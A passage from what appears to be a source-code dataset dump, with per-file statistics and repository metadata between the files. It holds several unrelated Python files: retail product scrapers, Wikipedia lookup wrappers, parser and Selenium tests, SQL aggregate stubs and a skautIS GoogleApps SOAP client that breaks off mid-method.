return self.__dict__
class TargetScrapper:
"""
Responsible for scraping Target data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = None
def parse_page_content(self, soup):
try:
self.product_name = soup.find('span', {"itemprop": "name"}).get_text().strip()
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('div', {"data-test" : "product-price"})
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('h2', {"data-test" : "ratingCountText"}).get_text() + ' out of 5 stars'
except Exception as e:
self.product_review_score = 'BAD REQUEST'
def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to Target scraping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument('--headless')
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
return self.__dict__
class CostcoScrapper:
"""
Responsible for scraping Costco data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = 'Available'
def parse_page_content(self, soup):
try:
self.product_name = soup.find('meta', property="og:description").get('content')
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('span', class_="op-value").get_text()
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('span', {"itemprop": "ratingValue"}).get_text()
except Exception as e:
self.product_review_score = 'BAD REQUEST'
def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to Costco scraping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument("--headless")
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
return self.__dict__
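# A hedged usage sketch; the product URL below is a placeholder, not a tested
# page, and a local Chrome installation is assumed.
if __name__ == '__main__':
    scrapper = AmazonScrapper('https://www.amazon.com/dp/B000000000')
    details = scrapper.fetch_product_details()
    print(json.dumps(details, indent=2))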
| 37.941489
| 121
| 0.628628
| 775
| 7,133
| 5.567742
| 0.148387
| 0.152955
| 0.081576
| 0.061182
| 0.86095
| 0.853534
| 0.853534
| 0.853534
| 0.839861
| 0.839861
| 0
| 0.001316
| 0.254171
| 7,133
| 187
| 122
| 38.144385
| 0.809774
| 0.068695
| 0
| 0.801418
| 0
| 0
| 0.119279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085106
| false
| 0
| 0.035461
| 0
| 0.177305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00be82da89ce20cb5e34e370b07a2f72a4247c94
| 1,854
|
py
|
Python
|
autogoal/contrib/wikipedia/_base.py
|
yacth/autogoal
|
a55c1534161e850587e2ca3533aa2fd5ae28569e
|
[
"MIT"
] | null | null | null |
autogoal/contrib/wikipedia/_base.py
|
yacth/autogoal
|
a55c1534161e850587e2ca3533aa2fd5ae28569e
|
[
"MIT"
] | null | null | null |
autogoal/contrib/wikipedia/_base.py
|
yacth/autogoal
|
a55c1534161e850587e2ca3533aa2fd5ae28569e
|
[
"MIT"
] | null | null | null |
import wikipedia
from autogoal.kb import Word, Entity, Summary, Flags
from autogoal.utils import nice_repr
@nice_repr
class WikipediaSummary:
"""This class find a word in Wikipedia and return a summary in english.
"""
def __init__(self):
pass
def run(self, input: Word(domain='general', language='english')) -> Summary():
"""Look up the input word on English Wikipedia and return its summary, or an empty string on failure.
"""
try:
return wikipedia.summary(input)
except:
return ""
@nice_repr
class WikipediaContainsWord:
"""This class find a word in Wikipedia and return a summary in english.
"""
def __init__(self):
pass
def run(self, input: Word(domain='general', language='english')) -> Flags():
"""Return a flag indicating whether the input word has search results on Wikipedia.
"""
return dict(in_wikipedia=bool(wikipedia.search(input)))
@nice_repr
class WikipediaSummarySpanish:
"""This class find a word in Wikipedia and return a summary in Spanish.
"""
def __init__(self):
wikipedia.set_lang("es")
def run(self, input: Word(domain='general', language='spanish')) -> Summary():
"""Look up the input word on Spanish Wikipedia and return its summary, or an empty string on failure.
"""
try:
return wikipedia.summary(input)
except:
return ""
@nice_repr
class WikipediaContainsWordSpanish:
"""This class find a word in Wikipedia and return a summary in Spanish.
"""
def __init__(self):
wikipedia.set_lang("es")
def run(self, input: Word(domain='general', language='spanish')) -> Flags():
"""Return a flag indicating whether the input word has search results on Spanish Wikipedia.
"""
return dict(in_wikipedia=bool(wikipedia.search(input)))
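# A hedged usage sketch (network access to Wikipedia is assumed; note that the
# Spanish variants call wikipedia.set_lang("es") globally on construction):
if __name__ == '__main__':
    print(WikipediaSummary().run('Python'))
    print(WikipediaContainsWord().run('Python'))  # e.g. {'in_wikipedia': True}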
| 27.671642
| 87
| 0.64671
| 228
| 1,854
| 5.149123
| 0.223684
| 0.034072
| 0.0477
| 0.0477
| 0.827939
| 0.827939
| 0.827939
| 0.827939
| 0.827939
| 0.827939
| 0
| 0.002874
| 0.249191
| 1,854
| 66
| 88
| 28.090909
| 0.840517
| 0.339806
| 0
| 0.666667
| 0
| 0
| 0.051107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.242424
| false
| 0.060606
| 0.090909
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
daa1a58fc6a2bd553100b97615e46ed4f3d051d2
| 457
|
py
|
Python
|
tests/test_rst_table.py
|
macfreek/restbuilder
|
1492b304b958ba687da8ab148f23f4aa0b699479
|
[
"BSD-2-Clause"
] | 23
|
2018-06-06T13:20:08.000Z
|
2022-02-10T07:21:14.000Z
|
tests/test_rst_table.py
|
macfreek/restbuilder
|
1492b304b958ba687da8ab148f23f4aa0b699479
|
[
"BSD-2-Clause"
] | 23
|
2018-03-19T15:56:31.000Z
|
2022-02-09T13:06:55.000Z
|
tests/test_rst_table.py
|
macfreek/restbuilder
|
1492b304b958ba687da8ab148f23f4aa0b699479
|
[
"BSD-2-Clause"
] | 22
|
2018-05-21T17:16:33.000Z
|
2022-02-17T05:44:31.000Z
|
from tests.utils import run_parse_test
def test_simple_table(src_dir, expected_dir, output_dir):
run_parse_test(src_dir, expected_dir, output_dir, 'common', ['simple-table'])
def test_grid_table(src_dir, expected_dir, output_dir):
run_parse_test(src_dir, expected_dir, output_dir, 'common', ['grid-table'])
def test_list_table(src_dir, expected_dir, output_dir):
run_parse_test(src_dir, expected_dir, output_dir, 'common', ['list-table'])
| 32.642857
| 81
| 0.772429
| 73
| 457
| 4.39726
| 0.232877
| 0.11215
| 0.261682
| 0.317757
| 0.700935
| 0.700935
| 0.700935
| 0.700935
| 0.700935
| 0.700935
| 0
| 0
| 0.107221
| 457
| 13
| 82
| 35.153846
| 0.786765
| 0
| 0
| 0
| 0
| 0
| 0.109409
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97382da6b3773b5bd22f076077975592d36fe888
| 2,818
|
py
|
Python
|
parser/fase2/team03/parse/functions/functions_aggregate.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 1
|
2021-01-09T09:39:57.000Z
|
2021-01-09T09:39:57.000Z
|
parser/fase2/team03/parse/functions/functions_aggregate.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | null | null | null |
parser/fase2/team03/parse/functions/functions_aggregate.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 4
|
2020-12-19T17:12:13.000Z
|
2021-01-07T20:29:53.000Z
|
from parse.ast_node import ASTNode
# From here on, classes describing aggregate functions
# TODO: ALL OF THEM ARE PENDING ON EXECUTION, ONLY DEFINITION HAS BEEN SET
class Avg(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Count(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Greatest(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Least(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Max(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Min(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Sum(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
class Top(ASTNode):
def __init__(self, exp, line, column):
ASTNode.__init__(self, line, column)
self.exp = exp
def execute(self, table, tree):
super().execute(table, tree)
return True
def generate(self, table, tree):
super().generate(table, tree)
return ''
def test():
avg = Avg('123', 1, 2)
avg.execute('1', '2')
if __name__ == '__main__':
    test()
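# A hypothetical sketch of what execution could look like once it is wired up;
# the list-of-dicts row shape and numeric cells are assumptions, not the
# project's real table API.
def _sum_sketch(rows, column):
    # Aggregate a numeric column over in-memory rows.
    return sum(float(row[column]) for row in rows)

# Example: _sum_sketch([{'price': '1.5'}, {'price': '2.5'}], 'price') -> 4.0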
| 22.725806
| 74
| 0.596167
| 342
| 2,818
| 4.722222
| 0.146199
| 0.178328
| 0.128793
| 0.178328
| 0.873684
| 0.873684
| 0.873684
| 0.873684
| 0.873684
| 0.873684
| 0
| 0.003455
| 0.28105
| 2,818
| 123
| 75
| 22.910569
| 0.793682
| 0.044358
| 0
| 0.847059
| 0
| 0
| 0.001859
| 0
| 0
| 0
| 0
| 0.00813
| 0
| 1
| 0.294118
| false
| 0
| 0.011765
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
97a2e158e5d674475f8e585f80d8538c7e2459fd
| 1,727
|
py
|
Python
|
app/selenium_ui/confluence_ui.py
|
AKStratus/dc-app-performance-toolkit
|
f2e264dd87969a075a69ebededea1c73dc3798d6
|
[
"Apache-2.0"
] | null | null | null |
app/selenium_ui/confluence_ui.py
|
AKStratus/dc-app-performance-toolkit
|
f2e264dd87969a075a69ebededea1c73dc3798d6
|
[
"Apache-2.0"
] | null | null | null |
app/selenium_ui/confluence_ui.py
|
AKStratus/dc-app-performance-toolkit
|
f2e264dd87969a075a69ebededea1c73dc3798d6
|
[
"Apache-2.0"
] | null | null | null |
from selenium_ui.confluence import modules
from extension.confluence import extension_ui # noqa F401
# this action should be the first one
def test_0_selenium_a_login(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.login(confluence_webdriver, confluence_datasets)
def test_1_selenium_custom_action(confluence_webdriver, confluence_datasets, confluence_screen_shots):
extension_ui.app_specific_action(confluence_webdriver, confluence_datasets)
def test_1_selenium_view_page(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.view_page(confluence_webdriver, confluence_datasets)
def test_1_selenium_create_page(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.create_confluence_page(confluence_webdriver, confluence_datasets)
def test_1_selenium_edit_page(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.edit_confluence_page(confluence_webdriver, confluence_datasets)
def test_1_selenium_create_comment(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.create_comment(confluence_webdriver, confluence_datasets)
def test_1_selenium_view_blog(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.view_blog(confluence_webdriver, confluence_datasets)
def test_1_selenium_view_dashboard(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.view_dashboard(confluence_webdriver, confluence_datasets)
# this action should be the last one
def test_2_selenium_z_log_out(confluence_webdriver, confluence_datasets, confluence_screen_shots):
modules.log_out(confluence_webdriver, confluence_datasets)
| 44.282051
| 103
| 0.872032
| 212
| 1,727
| 6.608491
| 0.193396
| 0.244111
| 0.372591
| 0.475375
| 0.878658
| 0.832976
| 0.743041
| 0.701642
| 0.571021
| 0.144897
| 0
| 0.007538
| 0.07817
| 1,727
| 38
| 104
| 45.447368
| 0.872487
| 0.046323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.45
| false
| 0
| 0.1
| 0
| 0.55
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
97b5fc2a1ca2d4ee14bae564e2facf8e8325bc59
| 166
|
py
|
Python
|
performance_tool.py
|
Mike-Scarlet/general_python_utils
|
9ec051a85f2c3c1d1da49307a8675f00051bdd57
|
[
"MIT"
] | null | null | null |
performance_tool.py
|
Mike-Scarlet/general_python_utils
|
9ec051a85f2c3c1d1da49307a8675f00051bdd57
|
[
"MIT"
] | null | null | null |
performance_tool.py
|
Mike-Scarlet/general_python_utils
|
9ec051a85f2c3c1d1da49307a8675f00051bdd57
|
[
"MIT"
] | null | null | null |
import time
class TimeInstance:
def __init__(self) -> None:
self.create_time = time.time()
def ElapsedTime(self):
return time.time() - self.create_time
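# A minimal usage sketch:
if __name__ == '__main__':
    timer = TimeInstance()
    time.sleep(0.1)
    print("elapsed: %.3fs" % timer.ElapsedTime())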
| 18.444444
| 41
| 0.698795
| 22
| 166
| 5
| 0.5
| 0.218182
| 0.254545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186747
| 166
| 9
| 41
| 18.444444
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c102566b7152d483af22c1fe89f832812f83b884
| 186
|
py
|
Python
|
pythonrestclient/__init__.py
|
Hawk73/python-rest-client
|
0a02af86f20a9cddec1f67752a0018e51a7bc82f
|
[
"MIT"
] | 1
|
2020-06-06T08:32:06.000Z
|
2020-06-06T08:32:06.000Z
|
pythonrestclient/__init__.py
|
Hawk73/python-rest-client
|
0a02af86f20a9cddec1f67752a0018e51a7bc82f
|
[
"MIT"
] | 1
|
2017-03-30T08:20:14.000Z
|
2017-03-30T10:19:14.000Z
|
pythonrestclient/__init__.py
|
Hawk73/python-rest-client
|
0a02af86f20a9cddec1f67752a0018e51a7bc82f
|
[
"MIT"
] | 1
|
2017-06-06T17:45:22.000Z
|
2017-06-06T17:45:22.000Z
|
from pythonrestclient.service_factory import ServiceFactory
from pythonrestclient.models.post_model import PostModel
from pythonrestclient.models.collection_class import CollectionClass
| 46.5
| 68
| 0.908602
| 20
| 186
| 8.3
| 0.65
| 0.361446
| 0.313253
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 186
| 3
| 69
| 62
| 0.954023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c136ba869848eda2e8436ba184dd3dc4ab2a8c92
| 35,654
|
py
|
Python
|
skautis/GoogleApps.py
|
janmpeterka/skautis-py
|
d335728c01d58e3c9dfab8c0b044117b177b8807
|
[
"BSD-3-Clause"
] | 6
|
2019-03-19T08:34:17.000Z
|
2022-01-20T19:28:17.000Z
|
skautis/GoogleApps.py
|
skaut/skautis-py
|
d335728c01d58e3c9dfab8c0b044117b177b8807
|
[
"BSD-3-Clause"
] | 4
|
2021-09-12T09:13:47.000Z
|
2022-01-16T08:39:05.000Z
|
skautis/GoogleApps.py
|
janmpeterka/skautis-py
|
d335728c01d58e3c9dfab8c0b044117b177b8807
|
[
"BSD-3-Clause"
] | 2
|
2021-09-26T11:01:29.000Z
|
2021-12-28T14:41:46.000Z
|
# -*- coding: utf-8 -*-
import zeep
# Web service for working with GoogleApps (writing data to the database, communicating with GoogleApps)
class GoogleApps(object):
__module__ = 'skautis'
def __init__(self, test):
if test:
self._client = zeep.Client('https://test-is.skaut.cz/JunakWebservice/GoogleApps.asmx?wsdl')
else:
self._client = zeep.Client('https://is.skaut.cz/JunakWebservice/GoogleApps.asmx?wsdl')
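    # A hedged usage sketch: each method below just proxies a SOAP call through
    # zeep, e.g. (login_guid is a hypothetical skautIS session token):
    #     ga = GoogleApps(test=True)
    #     ga.SyncTypeAll(ID_Login=login_guid)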
# Load the list of Google groups for synchronization
def GoogleGroupAllSync(self, ID_Login):
return self._client.service.GoogleGroupAllSync({"ID_Login": ID_Login})
# Load the list of synchronization requests
def GoogleGroupSyncRequestAll(self, ID_Login, ID_GoogleGroup, ID):
return self._client.service.GoogleGroupSyncRequestAll({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup, "ID": ID})
# Load the list of Google group synchronization settings
def GoogleGroupSyncSettingsAll(self, ID_Login, ID_GoogleGroup, ID, ID_SyncLevelType=None, ID_SyncType=None):
return self._client.service.GoogleGroupSyncSettingsAll({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup, "ID": ID, "ID_SyncLevelType": ID_SyncLevelType, "ID_SyncType": ID_SyncType})
# Delete Google group synchronization settings
def GoogleGroupSyncSettingsDelete(self, ID_Login, ID, ID_GoogleGroup, IsFunction, ID_Unit, GoogleGroup=None, ID_SyncLevelType=None, SyncLevelType=None, Units=None, SyncContactTypes=None, MembershipCategories=None, FunctionsDirect=None, Functions=None, ID_UnitType=None):
return self._client.service.GoogleGroupSyncSettingsDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "IsFunction": IsFunction, "ID_Unit": ID_Unit, "GoogleGroup": GoogleGroup, "ID_SyncLevelType": ID_SyncLevelType, "SyncLevelType": SyncLevelType, "Units": Units, "SyncContactTypes": SyncContactTypes, "MembershipCategories": MembershipCategories, "FunctionsDirect": FunctionsDirect, "Functions": Functions, "ID_UnitType": ID_UnitType})
# Create Google group synchronization settings
def GoogleGroupSyncSettingsInsert(self, ID_Login, ID, ID_GoogleGroup, IsFunction, ID_Unit, GoogleGroup=None, ID_SyncLevelType=None, SyncLevelType=None, Units=None, SyncContactTypes=None, MembershipCategories=None, FunctionsDirect=None, Functions=None, ID_UnitType=None):
return self._client.service.GoogleGroupSyncSettingsInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "IsFunction": IsFunction, "ID_Unit": ID_Unit, "GoogleGroup": GoogleGroup, "ID_SyncLevelType": ID_SyncLevelType, "SyncLevelType": SyncLevelType, "Units": Units, "SyncContactTypes": SyncContactTypes, "MembershipCategories": MembershipCategories, "FunctionsDirect": FunctionsDirect, "Functions": Functions, "ID_UnitType": ID_UnitType})
# Update the synchronization type of a Google group
def GoogleGroupUpdateSyncType(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupUpdateSyncType({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Synchronize a Google group
def GoogleGroupUpdateSync(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupUpdateSync({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Create a synchronization request
def GoogleGroupSyncRequestInsert(self, ID_Login, ID, ID_GoogleGroup, Created, Synced, IsSyncing, GoogleGroup=None, Exception=None):
return self._client.service.GoogleGroupSyncRequestInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "Created": Created, "Synced": Synced, "IsSyncing": IsSyncing, "GoogleGroup": GoogleGroup, "Exception": Exception})
# Finish a synchronization request with an error
def GoogleGroupSyncRequestUpdateError(self, ID_Login, ID, ID_GoogleGroup, Created, Synced, IsSyncing, GoogleGroup=None, Exception=None):
return self._client.service.GoogleGroupSyncRequestUpdateError({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "Created": Created, "Synced": Synced, "IsSyncing": IsSyncing, "GoogleGroup": GoogleGroup, "Exception": Exception})
# Finish a synchronization request
def GoogleGroupSyncRequestUpdateFinish(self, ID_Login, ID, ID_GoogleGroup, Created, Synced, IsSyncing, GoogleGroup=None, Exception=None):
return self._client.service.GoogleGroupSyncRequestUpdateFinish({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "Created": Created, "Synced": Synced, "IsSyncing": IsSyncing, "GoogleGroup": GoogleGroup, "Exception": Exception})
# Load the detail of Google group synchronization settings
def GoogleGroupSyncSettingsDetail(self, ID_Login, ID, ID_GoogleGroup):
return self._client.service.GoogleGroupSyncSettingsDetail({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup})
# Update Google group synchronization settings
def GoogleGroupSyncSettingsUpdate(self, ID_Login, ID, ID_GoogleGroup, IsFunction, ID_Unit, GoogleGroup=None, ID_SyncLevelType=None, SyncLevelType=None, Units=None, SyncContactTypes=None, MembershipCategories=None, FunctionsDirect=None, Functions=None, ID_UnitType=None):
return self._client.service.GoogleGroupSyncSettingsUpdate({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroup": ID_GoogleGroup, "IsFunction": IsFunction, "ID_Unit": ID_Unit, "GoogleGroup": GoogleGroup, "ID_SyncLevelType": ID_SyncLevelType, "SyncLevelType": SyncLevelType, "Units": Units, "SyncContactTypes": SyncContactTypes, "MembershipCategories": MembershipCategories, "FunctionsDirect": FunctionsDirect, "Functions": Functions, "ID_UnitType": ID_UnitType})
# Contact type for synchronization
def SyncContactTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.SyncContactTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# No documentation
def SyncLevelTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.SyncLevelTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Load the list of function types in Google group settings
def SyncSettingsFunctionTypeAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_FunctionType):
return self._client.service.SyncSettingsFunctionTypeAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_FunctionType": ID_FunctionType})
# Delete a function type in Google group settings
def SyncSettingsFunctionTypeDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_FunctionType, IsDirect, FunctionType=None):
return self._client.service.SyncSettingsFunctionTypeDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_FunctionType": ID_FunctionType, "IsDirect": IsDirect, "FunctionType": FunctionType})
# Create a function type in Google group settings
def SyncSettingsFunctionTypeInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_FunctionType, IsDirect, FunctionType=None):
return self._client.service.SyncSettingsFunctionTypeInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_FunctionType": ID_FunctionType, "IsDirect": IsDirect, "FunctionType": FunctionType})
# Load the list of membership categories in Google group synchronization settings
def SyncSettingsMembershipCategoryAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_MembershipCategory=None):
return self._client.service.SyncSettingsMembershipCategoryAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_MembershipCategory": ID_MembershipCategory})
# Delete a membership category in Google group synchronization settings
def SyncSettingsMembershipCategoryDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, MembershipCategories=None, ID_MembershipCategory=None, MembershipCategory=None, DisplayName=None):
return self._client.service.SyncSettingsMembershipCategoryDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "MembershipCategories": MembershipCategories, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "DisplayName": DisplayName})
# Create a membership category in Google group synchronization settings
def SyncSettingsMembershipCategoryInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, MembershipCategories=None, ID_MembershipCategory=None, MembershipCategory=None, DisplayName=None):
return self._client.service.SyncSettingsMembershipCategoryInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "MembershipCategories": MembershipCategories, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "DisplayName": DisplayName})
# Load the list of contact types in Google group synchronization settings
def SyncSettingsSyncContactTypeAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_SyncContactType=None):
return self._client.service.SyncSettingsSyncContactTypeAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_SyncContactType": ID_SyncContactType})
# Create a contact type in Google group synchronization settings
def SyncSettingsSyncContactTypeInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_SyncContactType=None, SyncContactType=None):
return self._client.service.SyncSettingsSyncContactTypeInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_SyncContactType": ID_SyncContactType, "SyncContactType": SyncContactType})
# Delete a contact type in Google group synchronization settings
def SyncSettingsSyncContactTypeDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_SyncContactType=None, SyncContactType=None):
return self._client.service.SyncSettingsSyncContactTypeDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_SyncContactType": ID_SyncContactType, "SyncContactType": SyncContactType})
# Load the list of units in Google group settings
def SyncSettingsUnitAll(self, ID_Login, ID_GoogleGroupSyncSettings, ID, ID_Unit):
